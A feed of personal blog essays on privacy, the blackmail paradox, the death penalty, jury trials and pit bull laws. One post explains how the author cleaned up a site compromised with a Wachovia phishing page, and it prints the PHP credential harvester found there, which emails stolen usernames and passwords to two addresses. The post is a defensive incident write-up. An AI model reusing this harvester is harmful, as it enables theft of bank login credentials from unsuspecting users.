Chronosynclastic Infundibulum » legal http://www.semanticoverload.com The world through my prisms Thu, 07 Apr 2011 17:36:17 +0000 en-US hourly 1 http://wordpress.org/?v=3.5 If a tree falls in the forest… http://www.semanticoverload.com/2010/08/04/if-a-tree-falls-in-the-forest/ http://www.semanticoverload.com/2010/08/04/if-a-tree-falls-in-the-forest/#comments Thu, 05 Aug 2010 04:42:25 +0000 Semantic Overload http://www.semanticoverload.com/?p=570 “If a tree falls in the forest and there is no one to hear it, does it still make a sound?” This, in essence, is the issue of privacy. If a specific action (or information) is unobservable (even after the fact) by no one else but the actor, then that act (or information) is, by definition, private. The actor could potentially by a single individual or a cohort. Now, because we are in the so-called “information age”, increasingly greater portions of our actions and our information are becoming observable. Unfortunately, very few of us realize this, and so many actions that we thought were private, are not so, and this getting a lot of people into hot water. Naturally, there is a backlash, and resulting turbulence is now presenting itself in all its glory all over the Internet.

Even though there is a lot of noise about privacy issues, there isn’t really anyone with a clear picture on where things are, where they will be heading, where they should be heading, and how do we as individuals adapt to these changes. I think the problem is that of methodology. People are trying to solve new-age problems with old-age tools; it’s not going to work. In this post, I attempt to explain my foregoing sentences.

Fatalists and conservatives. Let us take a look at the two major camps on the issue of privacy today. On one side you have the likes of Mark Zukerberg, David Thomson, and Samy Kamkar who believe that privacy is dead (the fatalists), and on the other side you have the likes of Future of Privacy Forum and Bruce Schneier who believe that maintaining our privacy is only a matter of setting up the right legal/economic framework of incentives and disincentives within the present (and future) context (the conservatives).

Both camps have valid points. Despite all the brouhaha about privacy issues with facebook, facebook continues to add more users, and current users continue to treat facebook as their repository of their social life and social interactions. So maybe privacy really is dead! But the very fact that there is such a backlash reveals the fissure in society where you have a significant faction that jealously guards many of its actions and its information, but finds that it is not able to maintain its privacy because ‘other entities’ (friends, banks, credit card companies, and such) are making them public. And there are still others who simply do not realize that what they think is private really is not. So the question is, what is the state of the art on this issue?

Privacy vs. Security. The first problem that you encounter when trying to answer that question is that there no common understanding of what privacy really is. Often people bleed their concerns of security into the issue of privacy. This is muddying the waters to the point where no coherent narrative emerges. While security is and should always be a grave concern, it an orthogonal issue to privacy. One possible consequence of loss of privacy is that the security of our property and resources is at jeopardy, but that is not a basis to conflate privacy with security. There should be separate discussions on each issue. They may complement each other but one should not supplement the other. Remember, a secure life does not guarantee a private life!

Privacy through public obscurity. Now that we know we talking exclusively about privacy and not security, we can move forward. In the past privacy has been protected largely due to the technological limitations that made several tasks intractable. Such intractability lead to privacy through public obscurity. For example, before the advent of telegraph and telephone, there was very little to worry about legitimate information about your activities (that you deem private) to your relatives in a different state. Why? Because of what I like to call Chinese-Whispers effect. But that changes with the ubiquity of telephones. Similarly, before the advent of the internet, at any point in your life, you were free to ‘reinvent’ yourself by simply moving to a new town, getting a new job and simply not citing individuals from your old life as references. There was very little anyone could reasonably do to dig up your past life (of course, you could always hire a private-eye, but that would constitute an unreasonable effort).

In fact, the privacy of your online communications with your bank are established by privacy through public obscurity. Worried? Don’t be, not for now at least. All `secure’ online communications use what is called public-key cryptography which involves dealing with numbers that have 100-200 digit prime numbers as their factors and encrypting messages with these numbers. In order to decrypt the message, one has to be able to factorize the large number into its constituent large prime numbers. The fastest-to-date mechanism to factorize a number is still by brute-force, and hence intractable. For even the fastest computers, this task could take years, by which time the contents of your private communication will be (hopefully) irrelevant. Thus, privacy through public obscurity.

I bring up the example of public-key encryption for a reason: the task of factorizing large numbers, although intractable right now, might not be so in the future (it wont be because the computer got faster, it will be because either quantum computers become a reality, or the answer to the famous P=NP problem in computer science is the affirmative). If that happens, then what do you think society’s response will be? Do you do expect two camps: one that says cryptography is dead, and another one that says all mechanisms to factorize numbers should be outlawed or disincentivised some how? Of course not. That’s an absurd proposition! The response will be to build a better cryptographic technique that works despite the state of the art.

We are facing a similar situation with privacy today, and the two camps that I referred to earlier are not helping. The fact remains that these days more often than not someone is hearing a tree fall in the forest, and so more trees are making a sound when they fall. So how do we deal with it?

First, learn to give up some of your privacy. Technology has made a lot of tasks tractable, and our physical and mental abilities and faculties are not evolving at a rate to match the pace of technology. Consequently, we are not able to make all our actions intractable to the new technology. So we have to give up some of our privacy. While this may be a ghastly notion for people in the western hemisphere, it is surprisingly common for societies in the eastern hemisphere to trade privacy for social support structure, security, and (more controversially) for happiness. Much like we have given up privacy for air flights but not for bus or train journeys, we may have to give up privacy in certain aspects of your life that we had otherwise considered to be private.

As for the natural follow-up question, what aspect of our privacy do we have to give up, I honestly don’t know. My speculations and proposals here are of methodological nature. I am not answering questions. I am just trying to figure out what the right questions to ask are! Isn’t that the first step in arriving at a resolution to our privacy issues?

Second, indulge in information overload. The less information you give out, the more useful every extra bit of information about you is. Inevitably, despite your best efforts, more information about you will leak out. So how do you counter that? With information overload. Take Hasan Elahi as a classic example. After he was erroneously put on the FBI terrorist watch list, and he had to endure a gruelling questioning by the FBI that took up hours of his time and ultimately to no one’s benefit, he decide to turn the tables on FBI. He put up a website called Tracking Transience where he has up up pictures, videos, and all sorts of evidence of where he has been and what he has been doing every hour of every day! Since there is already so much information about him available, any additional information about him is not so useful any more. Curiously, he doesn’t appear in any of this photographs. He is one behind the camera. So in a sense although he has given you so much information about him, he really hasn’t given you anything that is remarkably useful. Paradoxically, by revealing so much about himself online, he has secured his privacy. [For details, visit: http://memes.org/tracking-transience-hasan-elahi]

Ok, so Tracking Transience works for Hasan, what about the rest of us? Again, I am only showing you where to being asking the right questions; I do not have answers for you.

Are there any more tools of this or different kind that we can employ? Arguably, yes. One needs to look harder, and looks at different places. The new tools are different in kind, and presumably, in an ironic twist, an artefact the technology that has precipitated the issue of privacy in the first place.

In conclusion, my argument simply is that you cannot use old tools of fatalism, legal recourse, and economic regulation to frame the debate of privacy and expect a resolution. They are simply the wrong tools for the job! I will wrap this post up by continuing with the metaphor with which I started this article: if the tree falls in the forest and there are people to hear it, then let them hear it, but make sure that every minute sound made by the tree and the trees around it are perpetually amplified and broadcast to where the sound made by the falling tree become noise and simply irrelevant!

]]>
http://www.semanticoverload.com/2010/08/04/if-a-tree-falls-in-the-forest/feed/ 0
The Blackmail Paradox http://www.semanticoverload.com/2010/08/01/the-blackmail-paradox/ http://www.semanticoverload.com/2010/08/01/the-blackmail-paradox/#comments Sun, 01 Aug 2010 23:28:32 +0000 Semantic Overload http://www.semanticoverload.com/?p=516

source: http://s242.photobucket.com/home/skullard

While most agree that blackmail — the act of threatening to disclose true, but damaging, (potentially secret) information about a party unless payment is made (to earn silence) — is a criminal act, it poses two interesting paradoxes in the theory of criminal justice.

The paradoxes are as follows:

  • The first paradox is that “two rights make a wrong”; blackmail renders two otherwise perfectly legal actions illegal when performed in conjunction with each other. To use the example (albeit slightly modified) from Blackmail and Extortion – The Paradox Of Blackmail: “For example, if I threaten to expose a businessman’s income-tax evasion unless he gives me [sic] X amount of money, I have committed blackmail. I have a legal right to expose and to threaten to expose the tax evasion, and I have a legal right to request for [sic] X amount of money, but if I combine these rights I have committed blackmail. If both ends and means are otherwise legal, why is it blackmail to combine these legal ends and means?”
  • The second paradox, persisting with the example above, is: while it is consider blackmail for me to threaten to expose a businessman’s income-tax evasion unless he gives me X amount of money, it is perfectly legitimate for the businessman to voluntarily give me X amount of money (despite I not asking him and not even suggesting that I have knowledge and proof of this tax evasion) to not expose his income-tax evasion; it does not constitute blackmail.

These two paradoxes have been a thorn in the side of jurisprudence for many decades and are yet to be resolved to everyone’s satisfaction. In fact, these paradoxes have inspired a significant minority of scholars and libertarians to advocate for decriminalizing blackmail! Seeing how Wikipedia does not have an article on this issue (yeah, it surprised me too!), I decided to write something up in lieu of it. Let’s take a closer look at each paradox.

Paradox 1: Two rights make a wrong

The crux of the issue is the following. If the threat to commit an act (like murder) is dangerous enough to be criminalized, then the action itself must be more dangerous, and therefore be a crime. However, if an act in itself is not dangerous enough to be criminalized, then it makes little sense to criminalize the threat to commit that act. Paradoxically, blackmail  is criminalized despite the fact that it constitutes a threat to commit an act that is otherwise perfectly legal!

The many justifications for criminalizing blackmail include: it is immoral; it encourages disclosure of incriminating evidence, thus deterring crime; it helps minimize the “victims” from resorting to “self help”, like killing or harming the blackmailer, or even suicide; and so on. Unfortunately, none of these arguments really resolve the paradox. They merely explain how criminalizing blackmail is a good thing, but don’t really explain the nature of blackmail itself and why it should be an exception (and hence trigger the paradox).

It is easy to see why blackmail involving incriminating evidence is criminalized. First, if the blackmailer is withholding the evidence, and worse, profiting from it, then he/she has failed in their moral and civic duty. Second, withhold such information is obstructing justice. Third, profiting from something that presents a danger to public safety is morally reprehensible. But what about blackmail involving embarrassing information that has been obtained lawfully and where the blackmailer is within his/her legal rights to disclose it to public?

Here, it is helpful to examine the relationship between the parties to see how blackmail is different from all other legal threats. Again, to quote from Blackmail and Extortion – The Paradox Of Blackmail:

Consider first informational blackmail. Here the blackmailer threatens to tell others damaging information about the blackmail victim unless the victim heeds the blackmailer’s request, usually a request for money. The blackmailer obtains what he wants by using extra leverage. But that leverage belongs more to a third person than to the blackmailer. The blackmail victim pays the blackmailer to avoid involving third parties; he pays to avoid being harmed by persons other than the blackmailer. … In effect, the blackmailer attempts to gain an advantage in return for suppressing someone else’s actual or potential interest. The blackmailer is negotiating for his own gain with someone else’s leverage or bargaining chips.

Ken Levy from Harvard Law School offers the following arguments in [39 Conn. L. Rev. 1051] to resolve the paradox (while maintaining blackmail as a criminal activity):

Levy argues that while the correlation between the legality of the action and the legality of the threat of the action is strong, it is by no means is a causal relationship. That is, there is no reason to believe that legal threatened action entails a legal threat. Consequently, the paradox is simply an artefact of our bias and not the law itself. But that still does not explain why blackmail should be illegal.

Levy goes on to argue that the reason for this is that right to life, physical well-being, emotional well-being family, liberty, and property constitute what are called “legally protected” interests, and it is in the interest of the people and society that criminal law protect people against any harm inflicted to these interests. This is why acts like homicide, kidnapping, rape, assault, harassment (among many others) and even threats to commit such acts are deemed criminal. So where does that leave blackmail? Blackmail threatens a person’s reputation, and reputation is not a legally protected interest (although we are protected against disclosure of untrue, but reputation damaging, information). In fact, right to reputation and right to free speech are often in conflict, and we as a society happen to value right to free speech higher than right to reputation. Consequently, right to free speech becomes legally protected, but right to reputation is not. So, isn’t that an argument for decriminalizing blackmail?

To this, Levy argues that although right to reputation has been trumped by right to free speech in set of legally protected interests, the former, nevertheless, embodies the “spirit” of legally protected interests and individuals do treat reputation as an enshrined right, and in fact, this is precisely the reason why blackmail does succeed! Therefore, it follows that in all cases where right to reputation does not compete with or imping upon the right to free speech, any threat to the right of reputation should be considered on par with threats to other legally protected interests. Hence, blackmail should be criminalized even though its constituent actions in isolation should remain legal. This, Levy argues, resolves the first paradox. Levy concludes “well as a novel positive justification for criminalizing blackmail threats. Once again, blackmail threats should be
criminal for the same reason that menacing, harassment, and stalking are: they involve the reasonable likelihood, not to mention intent, of putting the target into a state of especially great fear and anxiety. And we as a society have decided that-like life, physical well-being, family, liberty, and property-emotional well-being is a supremely valued interest and therefore should be protected from deliberately inflicted injury when no competing moral or institutional interests, such as freedom of speech, would themselves be compromised.”

Paradox 2: Blackmailer-initiated vs. blackmailee-initiated

Here, if A offers to conceal B’s embarrassing, but true, information in exchange for money, then A is committing a crime (blackmail). But if B voluntarily offers money to A in exchange for A’s secrecy, it is a legitimate transaction. What is the difference between the two transactions that makes the first one a crime and not the second one?

Interestingly, the libertarian philosophy sees no distinction between the two transactions because they both take place between consenting adults and are the same transaction except for the party that initiates that transaction. The libertarians often cite the legitimacy of the second type of transaction to argue for the legalization of blackmail. On the other end of the spectrum, Marxists also see no difference between the two transactions, and often cite the illegitimacy of the first type of transaction to argue for criminalizing blackamilee-initiated transactions. The Liberal, on the other hand, has the hardest task of all: to argue for criminalizing the first transaction as being a crime while simultaneously making a compelling case to keep the second transaction legal.

Kathyrn H. Christopher argues for the Liberal case in her paper “Toward a resolution of blackmail’s second paradox” that appeared in Arizona State Law Journal, 37(4), 1127-1152, 2005. Christopher provides the following example:

Acceptance of money, pursuant to an unsolicited offer, not to commit a criminal act is lawful. For example, suppose that Lilli (a robberee), who is very rich and extremely averse to being robbed or threatened with harm, offers everyone she meets $1000 if they agree not to rob her. The recipients of Lilli’s offer neither insinuated they would rob her nor had any intention of robbing her—Lilli’s offer is entirely unsolicited. The recipients even inform Lilli of their lack of inclination to rob her. But Lilli is not to be denied, reiterates the offer, and the recipients finally accept. Have the recipients committed a crime by accepting Lilli’s money? Presumably not. They neither (impliedly or expressly) threatened Lilli, nor defrauded her, nor accepted money under false pretences. Thus, the recipients commit no crime by accepting Lilli’s money in return for agreeing not to rob her or threaten her with harm.

If accepting money, pursuant to an entirely unsolicited offer, not to commit a criminal act against the offeror is not a crime, then a fortiori accepting money (under the same circumstances) not to commit a lawful act must also not be a crime. If only one of the two were to be criminalized, it would be accepting money not to commit a criminal act. …one has the right to commit lawful acts. Thus, one should also have the right to accept money for foregoing the right to do that which one has a right to do.

Consequently, it should be legal for A to offer money to B so that B exercises B’s right to keep some (non-incriminating, but embarrassing) information about A secret.

Christopher then strengthens her argument with another example. Suppose blackmailee-initiated transaction was also criminalized, then

Case 1: Suppose that Blackmailer utters the following conventional blackmail threat to Blackmailee: “If you do not pay me $2000, then I will reveal your embarrassing secret.” Blackmailer accepts the $2000 payment from Blackmailee.
Outcome: Blackmailer is criminally liable for one count of blackmail.
Case 2: Suppose that Blackmailee 2 makes an unsolicited offer to pay $500 to Blackmailer 2 in return for Blackmailer 2 concealing Blackmailee 2’s secret. Blackmailer 2 rejects the offer. Blackmailer 2 counteroffers by uttering the conventional blackmail proposal (the same proposal as uttered by Blackmailer 1 above). Blackmailee 2 rejects the proposal and counteroffers $1000. Blackmailer 2 accepts these terms. Blackmailee 2 pays the money to Blackmailer 2 who accepts the payment.
Outcome: Blackmailer 2 is criminally liable for two counts of blackmail (or one count of blackmail and one count of the new crime of accepting money pursuant to a blackmailee’s offer of money).

Despite Blackmailer 2 obtaining one-half of the money that lackmailer obtained, Blackmailer 2 is, in a sense, twice as criminally liable as Blackmailer. Both Blackmailer and Blackmailer 2 commit the traditional offense of blackmail by uttering the threat. But unlike Blackmailer, Blackmailer 2 also commits a second count of blackmail

This is just plain absurd! Therefore, Christopher argues, that blackmailee-initiated transactions should remain legitimate. Thus resolving the second paradox.

Disclaimer: This post merely summaries other individuals’ research and is not the authors original intellectual property. All sources have been cited where appropriate. If there has been a misappropriation or negligence to cite some sources, I apologize and assure you that it was completely accidental. If you do notice something of this nature, please contact me and I will remedy the issue.

]]>
http://www.semanticoverload.com/2010/08/01/the-blackmail-paradox/feed/ 0
US Death Penalty Sans An Intellectual Argument http://www.semanticoverload.com/2010/01/08/us-death-penalty-sans-an-intellectual-argument/ http://www.semanticoverload.com/2010/01/08/us-death-penalty-sans-an-intellectual-argument/#comments Sat, 09 Jan 2010 04:54:39 +0000 Semantic Overload http://www.semanticoverload.com/?p=401 On October 23rd, 2009, the American Law Institute(ALI)  resolved to withdraw Section 210.6 of the Model Penal Code (MPC). The official copy of the resolution (proposed on April 15, 2009) is available here (in PDF). Why is this important? Simply because peeling back the obfuscating legalese reveals that this resolution has effectively demolished the intellectual underpinnings of the argument for and the practice of the death penalty in the US.

The resolution essentially says that the US Justice Systems are too irrepairably broken to admit a fair and just death penalty. In its own words:

.. more fundamentally Section 210.6 is simply inadequate to address the endemic flaws of the current system. Section 210.6, which in many respects provided the template for contemporary state capital schemes, represents a failed attempt to rationalize the administration of the death penalty and, for the reasons we discuss in greater detail below, its adoption rested on the false assumption that carefully-worded guidance to capital sentencers would meaningfully limit arbitrariness and discrimination in the administration of the American death penalty.

It lays out six important reasons for such disrepair [sourced from the actual text of the resolution (in PDF)]:

  1. Section 210.6 advocates for an individualized determination of a crime (specifically murder, under certain circumstances) to be considered for death penalty as appropriate sentencing. However, several states have statutory identification of which murders should command the death penalty, and furthermore, such statuary discretion leaves the jury with a ‘formula’ to award the death sentence (rather than individualized determination).
  2. Furthermore, the wide scope of murders/crimes that are currently eligible to extract the death sentence, under various state laws, is antithetical to the “spirit” and gravity of the punishment. The problem is that no state has successfully confined the death penalty to a narrow band of the most aggravated cases. Death eligibility in prevailing statutes remains breathtakingly broad, as aggravating
    factors or their functional equivalent often cover the spectrum of many if not most murders.
  3. There is an almost unforgivable racial bias in the ratio of the number of minorities sentenced to death compared to the total number. Persistent efforts by various groups to address this issue has yielded little fruitful results in terms of a legal remedy to this issue.
  4. The cost of administering the death-penalty is extremely high, and combined with the ineptitude of the defendants’ legal representation, the state incurs high costs in putting people to death who, arguably, do not deserve the punishment in the first place. The resolution noted: “Despite the fact that “effective assistance of counsel” is a recognized constitutional right, the scope of the right and the nature of the remedy have precluded the courts from being able to ensure the adequacy of representation in capital cases.”
  5. In light of DNA evidence and upcoming forensic technologies, the acceptable risk of having some persons sentenced to death later, and perhaps too late, be shown to not have committed the crime for which they were sentenced. This issues is highlighted in House v. Bell, in which, the petitioner sought federal review with substantial new evidence challenging the accuracy of his murder conviction, including DNA evidence conclusively establishing that semen recovered from the victim’s body actually came from the victim’s husband, as well as evidence of a confession to the murder by the husbandthe Tennessee Supreme Court refused to consider whether new DNA evidence presented during death penalty appeals necessitates a new trial, and declined to answer other questions posed.
  6. The politicization of judicial and gubernatorial elections has made death penalty a campaign issue, which leads to populist-style administration of the death penalty. Additionally, the politicization of the issue of capital punishment in the legislative sphere limits the capacity of legislatures to promote and maintain statutory reform. The kind of statutory reform that many regard as the most promising for ameliorating arbitrariness and discrimination in the application of the death penalty is strict narrowing of the category of those eligible for capital crimes.

In light of these observations, the resolution concludes: “these conditions strongly suggest that the Institute recognize that the preconditions for an adequately administered regime of capital punishment do not currently exist and cannot reasonably be expected to be achieved.”

]]>
http://www.semanticoverload.com/2010/01/08/us-death-penalty-sans-an-intellectual-argument/feed/ 0
If your site has been compromised with phishing attack code… http://www.semanticoverload.com/2009/03/17/if-your-site-has-been-compromised-with-phishing-attack-code/ http://www.semanticoverload.com/2009/03/17/if-your-site-has-been-compromised-with-phishing-attack-code/#comments Tue, 17 Mar 2009 07:30:42 +0000 Semantic Overload http://www.semanticoverload.com/?p=316 I recently recevied the following email:

To whom it may concern:

Please be aware that Wachovia Corporation (“Wachovia”) is the owner of numerous United States and foreign trade marks and services marks used in connection with its financial services and products (the “Wachovia Marks”), including the Wachovia wordmark and Wachovia logo.  Wachovia has expended substantial resources to advertise and promote its products and services under the marks and considers the marks to be valuable assets of Wachovia.

It has come to our attention that your company is hosting a known active phishing site.  The active phishing site displays the Wachovia Marks and is intended to defraud customers in an attempt to capture and use their identity.  Network Whois records indicate the IP address of the phishing site is registered to your Internet space.

Accordingly, we request that your site bring down the Phishing web site at:
<< http://<my website>/home/plugins/editors-xtd/confirm.html >>

So that’s how I knew that my site had been compromised by hackers and a phishing attack code had been injected into my site. If it has happened to you, do you know what is the right thing to do? How do you fix it? Well, here is what I did, and I think it is worthwhile to share this information so that it may be useful to others.. So here goes.

Step 1. Disable Your Site

First, disable your site, bring it down temporarily. The last thing you want is for more people to be scammed by a hacker who compromised your site. You can do that by disabling all access to all the files within your website. If the website is running on unix/linux you can do a “chmod -R 000 <website-home-directory>” (Refer to the chmod tutorial here). For those using cpanel, go to the file manager and change the permissions of the document root for the website.

Step 2. Investigate the Offending Webpage

Now that no more unsuspecting users can be affected by this phishing attack. Now we dig into the offending webpage that is causing the problem. In my case it was: http://<my website>/home/plugins/editors-xtd/confirm.html

I opened up the html file, and this is what I saw:

……

<html xmlns=”http://www.w3.org/1999/xhtml”><head>

<title>Wachovia – Personal Finance and Business Financial Services</title>

……

Clearly, someone was impersonating the Wachovia website. Now, with phishing, someone is trying to steal your username and password by impersonating some crediable website that needs your username and password to get into. In HTML, this is typically accomplished through ‘forms’, which starts with a `<form>’ tag in HTML. So I dug through the code and I saw two form tags.

The first one was:

<form method=”get” action=”http://search.wachovia.com/selfservice/microsites/wachoviaSearchEntry.do?” name=”searchForm” onsubmit=”return verifyQuery(this.searchString);”>

…..

This looks fine because the ‘action’ parameter points to http://search.wachovia.com/selfservice…. which is a search script on the Wachovia website. So anyone filling you this form is sendin their data to the Wachovia website and the hacker will not get any information from it.

Now to the second form tag:

<form method=”post” action=”screen.php” name=”uidAuthForm” id=”uidAuthForm” onsubmit=”return submitLogin(this)”>

……

Aha! The smoking gun! Why? Well, look at the ‘action’ parameter in this ‘form’ tag, it says ‘screen.php’ which is clearly not a script that is on the Wachovia servers, but something that is hosted on my website! So the hackers installed another script on my system to phish the username and passwords. Now I go see what’s inside this ‘screen.php’ file that is located in the same directory as the ‘confirm.html’ file we have been looking at so far.

Step 3. Isolate the script that is doing the actual phishing attack and find the offenders

So I open up the ‘screen.php’ file and this is what I find:

<?php

$ip = getenv(“REMOTE_ADDR”);
$datamasii=date(“D M d, Y g:i a”);
$userid = $HTTP_POST_VARS["userid"];
$password = $HTTP_POST_VARS["password"];
$mesaj = “Hello
userid : $userid
password : $password
——–0WN3d By Louis—————-
IP : $ip
DATE : $datamasii
“;

$recipient = “cashbug5010@gmail.com,smithgreen@hotmail.com”;
$subject = “Take What U need But Make Sure U Cash It Out !!!”;

mail($recipient,$subject,$mesaj);
mail($to,$subject,$mesaj);
header(“Location: http://www.wachovia.com/helpcenter/0,,,00.html”);
?>

So here we are! Gotcha! Check out the line ‘$recipient = “cashbug5010@gmail.com,smithgreen@hotmail.com”;’ Clearly, the phishing attack was being carried out by the following two email addresses: cashbug5010@gmail.com and smithgreen@hotmail.com. Now that I have this much information, what do we do next?

Step 4. Inform the Authorities

We give this information to the authorities who can carry the investigation forward. And who are they? First, respond back to the email address that alerted you of this phishing attack (do a ‘reply all’ if there were multiple recipients/Cc’s to the email you received). Also, copy phishing-report@us-cert.gov and cert@cert.org to this email and just give them a copy of the phishing code (in this case it was the file ‘screen.php’) and the offending email addresses you found.

As for now, that is all you can do, and just co-operate with the authorities if they need more information.

Step 5. Quarantine the Malicious Code and Restore Your Website

Quarantine the files (by disabling their permission to ’000′) and now that the code has been quarantined, you can bring your website up again by setting the permission back to as they were earlier (except for the offending code).

DO NOT DELETE THE MALICIOUS CODE BECAUSE IT IS EVIDENCE AGAINST THE PHISHING ATTACK AND EXONERATES YOU! Otherwise, the authorities may pursue you as an accessory to the crime!

Step 6. Inform Google That Your Site is Safe Again

Now, note that the odds are that Google has already put a notice out against your site as a source of a phishing attack. So go to the following URL http://www.google.com/safebrowsing/report_error/ to let Google know that the problem has been taken care off and you site is safe again.

And that’s all you can do for the moment. Make sure your site is secure and you haven’t given permission to any of your directories to be writable by anyone except you. As for preventing future security breaches, it is always a cat-and-mouse game with hackers and like of you getting smarter and better than the other.

]]>
http://www.semanticoverload.com/2009/03/17/if-your-site-has-been-compromised-with-phishing-attack-code/feed/ 7
Trial by Jury – A Flawed Model http://www.semanticoverload.com/2007/11/13/trial-by-jury-a-flawed-model/ http://www.semanticoverload.com/2007/11/13/trial-by-jury-a-flawed-model/#comments Tue, 13 Nov 2007 06:29:39 +0000 Semantic Overload http://semanticoverload.gaddarinc.com/?p=133 Trial by jury is a popular concept in the justice system. I haven’t yet understood how it is better than having a trained professional weigh evidence and award the judgment. I see it as a system that is prone to fault, and worse, fault undetectably!

When stripped down to essentials, the Jury is a collection of ‘average’, ‘everyday’ people who decide on a court case based on the evidence presented to them. The basic idea being, if 9 (or whatever number of) common folk think you are guilty, then you probably are. And if they think you deserve to spend x number of years in jail for it, then you probably do.

The Jury is supposed to deliver Justice. But what is justice? According to Plato “Justice is the interest of the stronger”, but Criminal Justice, on the other hand, can be stated as “a system of legislation, practices, and organizations, used by the state to maintain social control, deter and control crime” (paraphrased from wikipedia). The jury, in the present context is expected to deliver Criminal Justice. Now the question is, does it?

Objectivity (or lack thereof)

Criminal Justice operates upon a set of Laws. If any individual or organization violates the law, a crime is said to have been committed. One of the duties of the Jury is to determine if the law has indeed been broken. This process involves interpreting the law (often done by the lawyers for the jury) and determining whether or not the law was indeed broken. Such interpretation should, ideally, be an objective exercise. This is necessary to ensure ‘fairness’.

Let me digress for a few sentences. How does one determine the validity of an argument in a scientific effort. Typically through peer-review among subject matter experts. Why? Because they know the subject best, and are the best judge in determining if an argument is valid or not.

In other words, a person who is an expert in a particular area is a good judge of arguments in that area. Why should law be any different? Why is it assumed that an argument about the law is somehow best judged by a group of laypeople?

The consequence of this is loss of objectivity, and fairness in the system. People are too easily swayed by emotions, they are prejudiced by their own views, opinions, and value system. It takes an expert (like a judge trained in law) to divorce all this from the case at hand and be able to weigh the evidence and arguments. Jury of laypeople are no where near as qualified or skilled.

Awarding a Sentence

Often, the jury is also asked to determine the sentence (in terms of prison time, or financial payments) in many cases. This is an exercise that the jury is hopelessly ill-equipped for.

The prison system is often referred to as a ‘correctional system’. This is so because functionally, a prison is meant to serve as a place where the criminal does ‘penance’ for his/her crime and at the end of the term comes out as a ‘reformed’ person. So when a person is being sent to prison for x number of years, it has been determined that it will take the correctional facility x number of years to reform the person into a productive member of the society.

So my question is:By what (justifiable) qualification does the jury possess the authority to determine the time necessary for a criminal to be ‘corrected’ or ‘reformed’? The jury is regular people like you and I. If someone were to ask me how long does it take for (say) a street thug to be reformed, my honest answer would be “I dont know”. Then how can a jury, who have no knowledge or training in this matter, possibly know the time it takes for such a reform? Then how can they determine the right magnitude of sentence?

Restorative Justice vs. Retributive Justice

Most criminal justice systems in the world are based on restorative justice. Restorative justice focuses on establishing social harmony and mutual responsibility. So when determining whether or not a crime has been committed, and if so, then what the magnitude of sentence should be, it is important that social harmony be established by the justice system in that process. There have been many cases where the social harmony has been a major motivation for certain decisions by courts, eg:Brown vs. Board of Education, Gay Student Services vs. Texas A&M University, etc.

Such exercises in restorative justice, however, requires a excellent and thorough understanding of factors at the regional as well as global level. Even with local cases, because any case can become a precedent for future cases. The individual engaging in restorative justice must be aware of the implications that his/her decision will have on the landscape of law and justice in general.

Often, jury based justice system is only as smart as the jury (who are often average-joe-kind-of people), and hence not in any way enabled to engage in restorative justice. In the absence of specialized training, jury has no choice but to resort to a more primitive form of justice: retributive justice. Which essentially says that the punishment must fit the crime. An easy, but flawed yardstick to go by. Such retributive justice can result in denial of justice, and worse, become a precedent for future cases to follow, thus propagating this denial to future parties.

All of the above deficiencies can be remedied by moving away from a jury based trial to a trial by judge (under the assumption that the judge is a trained subject matter expert in law). Based on the above arguments, it hard not a conclude that the jury system is a model that is designed to fault undetectably. The undetectability of its faulting provides a false sense of confidence in the system. It is best done away with.

]]>
http://www.semanticoverload.com/2007/11/13/trial-by-jury-a-flawed-model/feed/ 0
Legalities with Pit Bull http://www.semanticoverload.com/2007/10/31/legalities-with-pit-bull/ http://www.semanticoverload.com/2007/10/31/legalities-with-pit-bull/#comments Wed, 31 Oct 2007 22:07:47 +0000 Semantic Overload http://semanticoverload.gaddarinc.com/?p=129 At my local community radio station, a pit bull puppy was found; presumably lost. There was some discussion about what should be done with it, should it be handed over to animal shelter? During the discussion, one of the volunteers has this to say about it:

Calling animal control for a Pit Bull in this county is a death sentence for the dog. They check for a chip, and if they don’t find one they immediately kill the dog. The breed is considered dangerous and a nuisance by ordinance and they will not adopt one out.

Having been through rescuing a Pit Bull myself I have to tell you that finding a home for one and keeping it out of the hands of the dog fight people is tough. I had one that I rescued from the house behind Early Bird boarded for close to seven months while I interviewed potential adopters, rejecting all of them that didn’t reject the dog because they either didn’t check out or immediately began patting the dog down and commenting on “really nice muscle tone” and how “well developed” they were as they drooled. I terminated interviews on the spot with close to half a dozen when it became clear what they wanted the dog for.

The sad fact of the matter is that Pit Bulls are a menace, not because they’re bad dogs but because they’re a “macho dog” that macho people get because they want to walk the macho dog and show off to everyone that they can handle a Pit. The problem is that they lose interest in the dog that they really didn’t want to begin with (they’re meant to be a prop, not a pet) and start letting the dog walk itself. The result is that either the dog gets killed by a car or truck on the road, by Animal Control if they’re picked up, or worst case they kill a human when they join up with a pack of other dogs and instinct takes over.

And the Pit Bull puppy mills continue to crank them out because there’s a market for them. For every macho person that loses interest there are two or three more that decide to express themselves by getting a Pit.

The only suggestion that I would have had to offer if I had seen this in time would be to put it in the station’s dog run, put out some food and water, then start trying to locate the owner or place him/her with a rescue group. I’ll warn you in advance that the rescue groups are completely clogged with dogs and they don’t want any more. Most of the ones that I called told me to take the dog to a vet and have them put down as the most expedient and humane way to rid the planet of yet another unwanted Pit Bull. No, I’m not exaggerating, that’s what I was told, over and over. That’s why we boarded the one that we rescued for so long.


I did some more research and found out that Pit Bulls have been discriminated against in many parts of the world. The article I found online about breed specific laws gives you a wealth of information about this issue.

The whole issue is murky for a host of reasons. First being the definition of ‘Pit Bull’ itself. As it turns out, Pit Bull is not a breed of dog. It a generic term applied to dogs used in dog fight, and are generally believed to be aggressive, and hence dangerous to human when left unsupervised.
Wikipedia’s definition of a Pit Bull is:

Pit bull is a term commonly used to describe several types of dogs with similar physical characteristics. Its use in media is often vague and rarely descriptive of specific breeds. There are several physically similar breeds that are often termed “pit bull”, including the American Pit Bull Terrier, American Staffordshire Terrier, the Staffordshire Bull Terrier, the Bull Terrier, the Perro de Presa Canario, Cane Corso, and Argentine Dogos.These breeds are usually not included by name in any Breed Specific Legislation (see below), but are sometimes included because of a broad definition and confusion as to what a pit bull actually is.

So it turns out that the term Pit Bull is somewhat of profiling, much like the profiling that is done by the U.S. Homeland Security, and the FAA where amazingly some (specific) people seem to always be randomly selected for security checks every time they fly.

A related legal ambiguity is that if Pit Bulls are not a breed and are not clearly defined, then how do you implement a law against the breed that (a) doesn’t exist, and (b) has no clear definition. The argument for it is typically the argument [Defining Obscenity] [Legal Proceedings] about defining ‘hard-core’ pornography, which goes something like this: “I shall not today attempt further to define the kinds of material I understand to be embraced . . . [b]ut I know it when I see it . . .”

